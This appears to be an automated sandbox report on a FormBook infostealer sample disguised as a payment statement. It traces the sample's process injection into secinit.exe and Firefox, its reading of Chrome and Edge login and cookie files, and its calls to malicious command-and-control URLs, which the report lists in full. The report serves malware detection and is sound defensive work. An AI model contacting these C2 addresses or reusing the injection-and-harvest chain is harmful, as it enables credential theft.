                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtResumeThread: Direct from: 0x77542FBC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtWriteVirtualMemory: Direct from: 0x7754490C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtDelayExecution: Direct from: 0x77542DDC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtReadFile: Direct from: 0x77542ADC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtQuerySystemInformation: Direct from: 0x77542DFC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtResumeThread: Direct from: 0x775436AC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtNotifyChangeKey: Direct from: 0x77543C2C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtCreateMutant: Direct from: 0x775435CC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtMapViewOfSection: Direct from: 0x77542D1C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Memory written: C:\Users\user\Desktop\SOA - Final Payment.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: NULL target: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: NULL target: C:\Windows\SysWOW64\secinit.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: NULL target: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe protection: read write
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: NULL target: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\secinit.exe Thread register set: target process: 8188
                Source: C:\Windows\SysWOW64\secinit.exe Thread APC queued: target process: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Process created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"Jump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2604341132.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655457243.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2605176992.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2604341132.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655457243.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2605176992.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2604341132.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655457243.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2605176992.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2604341132.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655457243.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2605176992.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Users\user\Desktop\SOA - Final Payment.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match | File source: 5.2.SOA - Final Payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.SOA - Final Payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.2602456510.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2603116280.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1730940118.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1733251033.0000000001590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2605626950.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1733539171.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2605336113.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\secinit.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 5.2.SOA - Final Payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.SOA - Final Payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.2602456510.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2603116280.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1730940118.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1733251033.0000000001590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2605626950.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1733539171.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2605336113.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph: ID 1612352, sample SOA - Final Payment.exe, start date 11/02/2025, architecture WINDOWS, score 100]

                Source | Detection | Scanner | Label
                SOA - Final Payment.exe | 62% | Virustotal |
                SOA - Final Payment.exe | 59% | ReversingLabs | Win32.Backdoor.FormBook
                SOA - Final Payment.exe | 100% | Joe Sandbox ML |

                No Antivirus matches

                Source | Detection | Scanner | Label
                http://www.bydotoparca.net | 100% | Avira URL Cloud | malware
                http://www.bydotoparca.net/s3u9/?4J=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEmvApV4bOCL+NdTgdCFBJIAA/S51Hhw==&pd=qdUp | 100% | Avira URL Cloud | malware
                http://www.physicsbrain.xyz/i9o2/?4J=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lsp5mJoJ4HYPoeUMJkyf7J+YlHSS38A==&pd=qdUp | 100% | Avira URL Cloud | malware

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
                www.physicsbrain.xyz | 13.248.169.48 | true | false | | high
                natroredirect.natrocdn.com | 85.159.66.93 | true | false | | high
                www.bydotoparca.net | unknown | unknown | false | | high

                Name | Malicious | Antivirus Detection | Reputation
                http://www.bydotoparca.net/s3u9/ | false | | high
                http://www.physicsbrain.xyz/i9o2/?4J=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lsp5mJoJ4HYPoeUMJkyf7J+YlHSS38A==&pd=qdUp | false | Avira URL Cloud: malware | unknown
                http://www.bydotoparca.net/s3u9/?4J=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEmvApV4bOCL+NdTgdCFBJIAA/S51Hhw==&pd=qdUp | false | Avira URL Cloud: malware | unknown

                Name | Source | Malicious | Antivirus Detection | Reputation
                https://ac.ecosia.org/autocomplete?q= | secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/chrome_newtab | secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/ac/?q= | secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico | secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.bydotoparca.net | 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2608255794.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://www.ecosia.org/newtab/ | secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmp | false | | high

                IP | Domain | Country | ASN | ASN Name | Malicious
                13.248.169.48 | www.physicsbrain.xyz | United States | 16509 | AMAZON-02US | false
                85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false

                Joe Sandbox version: 42.0.0 Malachite
                Analysis ID: 1612352
                Start date and time: 2025-02-11 18:41:13 +01:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 9m 15s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed: 14
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: SOA - Final Payment.exe
                Detection: MAL
                Classification: mal100.troj.spyw.evad.winEXE@11/2@2/2
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 93%
                • Number of executed functions: 110
                • Number of non-executed functions: 265
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.19.244.127, 20.109.210.53
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                • Not all processes were analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.

                Time | Type | Description
                12:42:06 | API Interceptor | 2x Sleep call for process: SOA - Final Payment.exe modified
                12:43:19 | API Interceptor | 1340864x Sleep call for process: secinit.exe modified

                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                13.248.169.48 | BINATONE LLC RFQ.Vbs.vbs | malicious | FormBook | www.meacci.xyz/ieqn/
                13.248.169.48 | REVISED PROFORMA INVOICE.exe | malicious | FormBook | www.gnolls.xyz/d6sm/
                13.248.169.48 | JJ0tnjLiDS.exe | malicious | FormBook | www.bitcoinvendor.xyz/1lt7/
                13.248.169.48 | QCX ender user 2025.exe | malicious | FormBook | www.autonomousrich.xyz/5l58/
                13.248.169.48 | crypt.exe | malicious | FormBook | www.brothersharetender.xyz/rbx9/
                13.248.169.48 | Purchase Order No. STPL014724.exe | malicious | FormBook | www.prepaidbitcoin.xyz/yz57/
                13.248.169.48 | Updated 2025 Trading Agreement for Direct Purchase.exe | malicious | FormBook | www.shibbets.xyz/r026/
                13.248.169.48 | Confirmation Receipt for ETF_20250211_HSBCEU314AX51920DEU.vbe | malicious | FormBook | www.hotethereum.xyz/t7vo/
                13.248.169.48 | 06OJsSI8WG.exe | malicious | FormBook | www.satoshichecker.xyz/2inw/
                13.248.169.48 | INV-20250210.vbs | malicious | FormBook | www.nakaligtas.xyz/lcrb/
                85.159.66.93 | REVISED PROFORMA INVOICE.exe | malicious | FormBook | www.bydotoparca.net/q8ji/
                85.159.66.93 | QCX ender user 2025.exe | malicious | FormBook | www.bydotoparca.net/s3u9/
                85.159.66.93 | AWB114.exe | malicious | FormBook | www.magmadokum.com/fo8o/
                85.159.66.93 | SOA - Final Payment.exe | malicious | FormBook | www.bydotoparca.net/s3u9/
                85.159.66.93 | SOA-CAVER.exe | malicious | FormBook | www.bydotoparca.net/s3u9/
                85.159.66.93 | Outanding payment Paid.exe | malicious | FormBook | www.bydotoparca.net/q8ji/
                85.159.66.93 | PO490102808.exe | malicious | FormBook | www.letsbookcruise.xyz/coi2/
                85.159.66.93 | 110501.exe | malicious | FormBook | www.tabyscooterrentals.xyz/2rw4/
                85.159.66.93 | Purchase Order.hta | malicious | FormBook | www.arwintarim.xyz/sfqx/
                85.159.66.93 | PO#910663595.exe | malicious | FormBook | www.arwintarim.xyz/2kkr/

                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                www.physicsbrain.xyz | QCX ender user 2025.exe | malicious | FormBook | 13.248.169.48
                www.physicsbrain.xyz | SOA - Final Payment.exe | malicious | FormBook | 13.248.169.48
                www.physicsbrain.xyz | SOA-CAVER.exe | malicious | FormBook | 13.248.169.48
                www.physicsbrain.xyz | DHL.Vbs.vbs | malicious | FormBook | 13.248.169.48
                www.physicsbrain.xyz | BJKzw4jO7c.exe | malicious | FormBook | 13.248.169.48
                www.physicsbrain.xyz | PAYMENT.js | malicious | FormBook | 13.248.169.48
                www.physicsbrain.xyz | Gd3lOevK672JYIK.zip.exe | malicious | FormBook | 13.248.169.48
                www.physicsbrain.xyz | PAYMENT.js | malicious | FormBook | 13.248.169.48
                www.physicsbrain.xyz | Payment slip.exe | malicious | FormBook, PureLog Stealer | 13.248.169.48
                www.physicsbrain.xyz | REQUIS_SP_DAR_0125L.exe | malicious | FormBook | 13.248.169.48
                natroredirect.natrocdn.com | REVISED PROFORMA INVOICE.exe | malicious | FormBook | 85.159.66.93
                natroredirect.natrocdn.com | QCX ender user 2025.exe | malicious | FormBook | 85.159.66.93
                natroredirect.natrocdn.com | AWB114.exe | malicious | FormBook | 85.159.66.93
                natroredirect.natrocdn.com | SOA - Final Payment.exe | malicious | FormBook | 85.159.66.93
                natroredirect.natrocdn.com | SOA-CAVER.exe | malicious | FormBook | 85.159.66.93
                natroredirect.natrocdn.com | Outanding payment Paid.exe | malicious | FormBook | 85.159.66.93
                natroredirect.natrocdn.com | PO490102808.exe | malicious | FormBook | 85.159.66.93
                natroredirect.natrocdn.com | 110501.exe | malicious | FormBook | 85.159.66.93
                natroredirect.natrocdn.com | Purchase Order.hta | malicious | FormBook | 85.159.66.93
                natroredirect.natrocdn.com | PO#910663595.exe | malicious | FormBook | 85.159.66.93
                s-part-0017.t-0009.t-msedge.net | #U0395#U03a1#U0395#U03a5#U039d#U0391.xls | malicious | Unknown | 13.107.246.45
                s-part-0017.t-0009.t-msedge.net | TT COPY.xls | malicious | Unknown | 13.107.246.45
                s-part-0017.t-0009.t-msedge.net | Quotation.xls | malicious | Unknown | 13.107.246.45
                s-part-0017.t-0009.t-msedge.net | #U0395#U03a1#U0395#U03a5#U039d#U0391.xls | malicious | Unknown | 13.107.246.45
                s-part-0017.t-0009.t-msedge.net | TT COPY.xls | malicious | Unknown | 13.107.246.45
                s-part-0017.t-0009.t-msedge.net | https://efaa-access5baf12d94e0c4cbbb7599873c26f8afb.powerappsportals.com/ | malicious | Unknown | 13.107.246.45
                s-part-0017.t-0009.t-msedge.net | INQ Q25LSS0168.docx | malicious | Unknown | 13.107.246.45
                s-part-0017.t-0009.t-msedge.net | InvNo.248770.xls | malicious | Unknown | 13.107.246.45
                s-part-0017.t-0009.t-msedge.net | SWIFT COPY.xls | malicious | Unknown | 13.107.246.45
                s-part-0017.t-0009.t-msedge.net | #U0395#U03a1#U0395#U03a5#U039d#U0391.xls | malicious | Unknown | 13.107.246.45
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CIZGITRREVISED PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            QCX ender user 2025.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            AWB114.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            SOA - Final Payment.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            SOA-CAVER.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            Outanding payment Paid.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            PO490102808.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            110501.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            Purchase Order.htaGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            PO#910663595.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            AMAZON-02USBINATONE LLC RFQ.Vbs.vbsGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            http://d1xkzbyjtghizd.cloudfront.netGet hashmaliciousUnknownBrowse
                                            • 18.245.78.138
                                            REVISED PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            JJ0tnjLiDS.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            https://tsa.formaloo.co/pv4hi3Get hashmaliciousHTMLPhisherBrowse
                                            • 54.231.128.248
                                            https://click.mailchimp.com/track/click/30010842/forms.office.com?p=eyJzIjoiUU5MTE43blNUdEQxbUdOR3lwdVJ3M1kyVHBzIiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2Zvcm1zLm9mZmljZS5jb21cXFwvUGFnZXNcXFwvU2hhcmVGb3JtUGFnZS5hc3B4P2lkPWkwYWxtWEtzYWtDTnNoUThad2JsWnVHaXRELXJkRk5MbngxZkVDU0RBUGRVT1VWWE9WSTJUa0ZNVFRaSU1EUldUa2RZVmtWSlEwczBVUzR1JnNoYXJldG9rZW49cWhZMVVQRWtyM0NGdjJpcUlpTUtcIixcImlkXCI6XCIzYjUxMDE1ZDY0ODc0ZDdkOWMwNjg2OGM5Y2M5OWVjOFwiLFwidXJsX2lkc1wiOltcIjVkMTg5YTdhMzU1NWIyZWQ5ZjBlNmQ4ZTM3MWFjZmM1ZDE4NzMwYmRcIl19In0Get hashmaliciousHTMLPhisherBrowse
                                            • 76.223.125.47
                                            kHWCtJ64Z2.elfGet hashmaliciousAvailable For TrialBrowse
                                            • 54.171.230.55
                                            Owari.mips.elfGet hashmaliciousUnknownBrowse
                                            • 108.150.151.189
                                            https://r.bgroupusportugal.pt/redirect.php?disp=morta_ans11_10-02_20_50000&idc=1&email=uuser@wpb.org&mode=resetPassword&oobCode=fA9TMT-qLiJF54BFl3bAmwEgjXEBn69dwNFjpDzVlzcAAAGU8a8rwg&apiKey=AIzaSyD3eywpo5yGXrXV5Eo__cDlhXtgd0VYeNc&lang=enGet hashmaliciousUnknownBrowse
                                            • 52.49.16.156
                                            Owari.sh4.elfGet hashmaliciousUnknownBrowse
                                            • 18.138.65.20
                                            No context
                                            No context
Process: C:\Users\user\Desktop\SOA - Final Payment.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
